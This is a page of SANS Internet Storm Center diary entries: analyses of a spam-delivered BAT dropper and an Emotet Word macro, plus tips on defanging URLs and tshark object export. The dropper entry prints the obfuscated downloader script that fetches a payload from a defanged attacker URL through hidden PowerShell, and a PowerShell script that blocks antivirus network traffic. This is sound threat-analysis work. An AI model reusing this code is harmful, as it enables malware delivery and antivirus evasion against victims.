(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

Malicious script dropping an executable signed by Avast?, (Wed, Aug 23rd)

Yesterday, I found an interesting sample that I started to analyze… It reached my spam trap attached to an email in Portuguese with the subject: “Venho por meio desta solicitar orçamento dos produtos” (“I hereby request the products budget”). There was one attached ZIP archive: PanilhaOrcamento.zip (SHA1: 3c159f65ba88bb208df30822d2a88b6531e4d0a7) with a VT score of 0/58[1].

Inside the archive, a simple BAT file: “Panilha Orcamento Contabil 32f5.bat” (SHA1: c191821ddb1db46349afdb08789312ce418696d1) with was unknown on VT. The content is simple: it generates a .wsf file that is spawned through Powershell:

@echo off
set bmh="%HOMEPATH%btmkfxbumrria.wsf"
echo ^^^^<![CDATA[var t5lTT;(function(){function a(){function b(){function b(){function c(){function d(){var g=function(d){if(b=== null){b= 0};var f=^"M^";var g=^"^";if(b=== false){b(null,0,false,1);return};f= f+ ^"S^";if(!b){b(0,1);b= null};if(c=== true){c(true);if(b=== null){b= null;return}else {return}};if(!b){b();return};f= f+ ^"X^";f= f+ ^"M^";f= f+ ^"L^";if(c=== true){c(1,1)};f= f+ ^"2^";if(c== 0){if(!b){b(true,0)};c();c= false;if(b=== 1){b();b= true;return};return}else {f= f+ ^".^"};f= f+ ^"X^";if(!c){if(!b){b()};c(0);if(b=== null){b();b= null;return};c= true;return};f= f+ ^"M^";if(b== null){b(null,true);b= null};f= f+ ^"L^";f= f+ ^"H^";f= f+ ^"T^";f= f+ ^"T^";if(!c){c();if(b=== true){return};c= null};g= ^"123^";f= f+ ^"P^";if(b=== true){b();b= 0};if(c=== null){c= null}else {if(b== 1){b()};if(d== 2){if(c=== null){c(1,0);if(b=== true){b= null;return};return};return  new ActiveXObject(f)}};return false};var j=function(k,f,g){if(!c){c= null;return};var h=^"^";if(!d){d(false,null);if(!c){c= false;if(!b){return};return};return};var j=^"^";if(b== null){b()};if(f== 3){h= ^"G^";if(b=== null){b(false,true,null);b= null};h= h+ ^"E^";h= h+ ^"T^"};if(!d){if(!c){return};return};if(g== 4){if(b=== 1){return}else {if(!d){if(!b){b= 1};d(null);d= false;if(!b){b= 1};return}};if(b== false){b(null,false,null,0,true);b= 1;return}else {j= ^"hXXps://1591523753.rsc.cdn77[.]org/p2r.php?^"}};k.Open(h,j,false)};if(c== null){c= false};var f=function(){try{var f=g(2);j(f,3,4);if(!d){d(null);if(b== null){b(0,false,1)};d= 0};f.Send();var h=f.Status;if(h+ 2== 202){var c=function(){return f.responseText};return c()}}catch(e){};if(b== true){b(false);b= true;return};if(d== 1){if(!b){b= null;return};d= null;return};if(b== 1){return};return false};if(!c){c= true;return}else {if(b=== null){b();b= 1};for(i= 0;i^^^ > %bmh%
%SystemRoot%System32WindowsPowerShellv1.0powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -command Start-Process '"%bmh%”'

A payload is downloaded from hXXps://1591523753.rsc.cdn77[.]org/p2r.php? (note that a valid SSL certificate is used) and two files are created:

C:rx hsdjoixffax bnzxfvenotify.exe (SHA1: 6d28d5453d0c2ca132ba3b3d7f0a121427090c1eb52f7d2a5c3e4e5440411bc7)
C:rx hsdjoixffax bnzxsecur32.dll (SHA1: 2ee0c761a25310e34c9d3c9d3e810192d8bbd10d4051522e3eefdc1bd71a17bb)

The file fvenotify.exe is reported clean on VT[2] and is signed by Avast as their SafeZone Browser[3]. When I re-executed the WSF file, the name changed to “ftp.exe”.

But the suspicious PE file generates a new PowerShell script in %TEMP% and executes it. It modifies the current Windows firewall rules to prevent some antivirus to “phone home”. Here is the script:

function Add-FirewallRule {
    param( 
        $name,
        $appName = $null,
        $serviceName = $null
    )

    $fw = New-Object -ComObject hnetcfg.fwpolicy2 
    $rule = New-Object -ComObject HNetCfg.FWRule
        
    $rule.Name = $name
    if ($appName -ne $null) { $rule.ApplicationName = $appName }
    if ($serviceName -ne $null) { $rule.serviceName = $serviceName }
    $rule.Protocol = 6
    $rule.Enabled = $true
    $rule.Grouping = "@firewallapi.dll,-23255"
    $rule.Profiles = 7
    $rule.Action = 0
    $rule.EdgeTraversal = $false
    $rule.Direction = 2
    
    $fw.Rules.Add($rule)
}

function FirewallEnable {
    param(
        $profile
    )

    $fw = New-Object -ComObject hnetcfg.fwpolicy2
    
    $fw.FirewallEnabled($profile) = $true
}

FirewallEnable 1
FirewallEnable 2
FirewallEnable 4

Add-FirewallRule "3txqSDF2" "%ProgramFiles%AVAST SoftwareAvastavastui.exe"
Add-FirewallRule "Ytb7kY9a" "%ProgramFiles%AVAST SoftwareAvastAvastSvc.exe"
Add-FirewallRule "xgmQL8Wb" "%ProgramFiles%AVAST SoftwareAvastsetupinstup.exe"

Add-FirewallRule "ABZBkNHB" "%ProgramFiles(x86)%AVGAntivirusavgui.exe"
Add-FirewallRule "eLGeMJyw" "%ProgramFiles(x86)%AVGAntivirusAVGSvc.exe"
Add-FirewallRule "9LEY6ZsT" "%ProgramFiles(x86)%AVGAntivirussetupinstup.exe"

Add-FirewallRule "uNUG4JaK" "%ProgramFiles%Windows DefenderMpCmdRun.exe"
Add-FirewallRule "d9mjBtLt" "%ProgramFiles%Windows DefenderMSASCui.exe"

Remove-Item $MyInvocation.MyCommand.Definition

The rules are indeed created:

The PE file fvenotify.exe is added to the Run registry for persistence. I’ll check deeper the PE file but did you already detect the same behaviour? Please share!

[1] https://www.virustotal.com/#/file/9329de591b51c367908f2916307a4d2277caa2c766f2cecac8d06e02a2416246/detection
[2] https://www.virustotal.com/#/file/6d28d5453d0c2ca132ba3b3d7f0a121427090c1eb52f7d2a5c3e4e5440411bc7/detection
[3] https://www.avast.com/f-safezone

Xavier Mertens (@xme)
ISC Handler – Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

Defang all the things!, (Tue, Aug 22nd)

Today, I would like to promote a best practice via a small Python module that is very helpful when you’re dealing with suspicious or malicious URLs. Links in documents are potentially dangerous because users can always click by mistake on them. Many automated tools and scripts are processing documents to fetch links. Even if the original document does not provide dynamic links, many applications will detect them and change them to real links. Clicking on a link could not only affect the security of the user/computer but it could also leak data or pollute statistics. A good example is the kill switch domain of WannaCry that was linked in many articles by journalists a few weeks ago.

The classic technique to prevent URLs to be “clickable” is to defang them.  Defang means, the HTML part of the URL is “changed” but still readable for the human eye. It will look like this:

“https://isc.sans.edu/” is replaced with “hXXps://isc.sans[.]edu/”

Python is a powerful language available on all operating systems and has plenty of modules. Of course, there is a “defang module” available[1]. To install it, just use pip:

# pip install defang

The module is available in your Python scripts but also as a standalone tool:

# echo https://isc.sans.edu/ | defang
hXXps://isc.sans[.]edu/

You can process an existing file, all found URLs will be defanged:

# defang -i /tmp/urls.tmp | tee /tmp/urls.txt.safe
hXXps://blog.rootshell[.]be
fXp://ftp.belnet[.]be
hXXp://www.acme[.]com

In Python:

# python
Python 2.7.12 (default, Nov 19 2016, 06:48:10)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from defang import defang
>>> u="https://isc.sans.edu/"
>>> defang(u)
'hXXps://isc.sans[.]edu/'
>>>

On my MacBook, I automated this with a Service to defang the select text and replace it:

The classic scenario is to defang URLs in emails. In the Mail application, I just select the email body to defang all the URLs in one shot!

Finally, defang can also “refang” URLs:

echo ‘hXXps://blog.rootshell[.]be’ | defang -r

https://blog.rootshell.be

That’s easy and safer when you need to exchange malicious links with your peers!

[1] https://pypi.python.org/pypi/defang

Xavier Mertens (@xme)
ISC Handler – Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

It's Not An Invoice …, (Sun, Aug 20th)

Jeff received an invoice via email, did not trust it and submitted it to us.

As expected, it was not an invoice, but a malicious Word document (MD5 9c4c3234f20b6102569216675b48c70a).

I do a step by step analysis in this diary entry, but you can also watch a video of the analysis:

Let’s take a look with oledump.py:

As we can see from the M and m indicators, there are streams inside this OLE file with VBA macros.

Let’s take a look at the first stream with macros:

This code seems to contain a lot of useless strings, to obfuscate the real malicious code. But we see an autoopen subroutine, so this code will automatically execute when the document is opened (and permissions are given).

One of the tricks I like to use to quickly search through obfuscated code, is to look at lines that contain a dot (.), like this:

So we see CreateObject, with Run$. And also an expression accessing the “Comments” document property.

Let’s take a look at the metadata:

It sure looks like the comments property contains BASE64 data. Let’s try to decode it with base64dump.py:

This looks like UNICODE text, let’s take a closer look:

It’s definitively UNICODE text, a PowerShell script.

Let’s extract it (option -S dumps strings):

This PowerShell script is obfuscated: backquotes are used inside variable names (WscRIpt) and strings are split.

But we can still see that some string fragments contain URLs. We can take the PowerShell expression that concatenates the split string with URLs, to recover the URL. Doing this in PowerShell is not a risk, since this is a pure string expression that does not execute any malicious code.

When I did this analysis, 4 URLs were still active and hosted the same malicious executable (MD5 72fd33962214213bfa5d5a166e21b526): a variant of Emotet.

Didier Stevens
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

tshark 2.4 New Feature – Command Line Export Objects, (Fri, Aug 18th)

There is nothing new about Wireshark releasing an update; however, the new 2.4 branch has new feature that is quite useful that I have been waiting to be able to use for a while. In case you missed it, tshark now has the ability to Export Objects. I have tested the export using large pcap files with multiple objects and tshark does a good job “dumping” all the files in the specified directory (i.e. destdir).

To extract HTTP or SMB objects from the command-line, run the following command:

tsahrk -nr file.pcap –export-objects http,destdir
tshark -nr file.pcap –export-objects smb,destdir


[1] https://www.wireshark.org/#download

———–
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.